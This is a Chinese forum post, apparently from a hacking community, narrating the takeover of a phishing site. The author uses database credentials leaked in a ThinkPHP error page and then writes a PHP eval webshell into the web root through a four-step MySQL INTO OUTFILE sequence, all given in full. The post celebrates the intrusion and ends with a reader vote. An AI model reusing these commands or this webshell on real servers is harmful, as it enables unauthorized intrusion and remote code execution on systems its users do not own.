某钓鱼网站getshell【通过】

在闲逛论坛发现一个钓鱼网站

Xxxx.com/1.php

页面这么LOW一看就是和我一样的菜鸟弄的,开始搞起(#^.^#)

下意识输入/admin,没想到蹦出一个后台页面,不需要登录,不是钓鱼页面后台。

那就把目录挨个点点试下,点击某个后蹦出下面报错,thinkphp,但是又发现数据库连接错误,下面是不是数据库的账户密码呢,在下决定试上一试,如果成功就水到渠成了。

image

成功连上

那就准备getshell吧,报错页面看到了路径

开始MySQL写一句话木马

1、创建一个表

CREATE TABLE a (cmd text NOT NULL);

2、插入数据

INSERT INTO a (cmd) VALUES('<?php eval($_POST['password']);?>');

3、导出一句话

SELECT cmd from a into outfile '/home/www/web/thinkphp5.1/msy/public/webshell.php';

4、删除表

Drop TABLE IF EXISTS a;

成功上线,getshell成功。

正准备洗洗睡的时候,突然想到不是钓鱼吗,钓的鱼呢,蚁剑查看目录,看看那个1.php文件

哈哈哈果然证明了我刚开始的才想,真是和我一样的菜鸟,把“鱼”放在了文本里。

打开看看,这么low的钓鱼站,里面真实数据没有,全是骂他的,舒服了,睡觉

过程简单,大佬看看就好,提权没成功,学识短浅,毕竟我是小菜鸟

大佬们投一票,谢谢 Thanks♪(・ω・)ノ

  • 通过
  • 未通过

0 投票者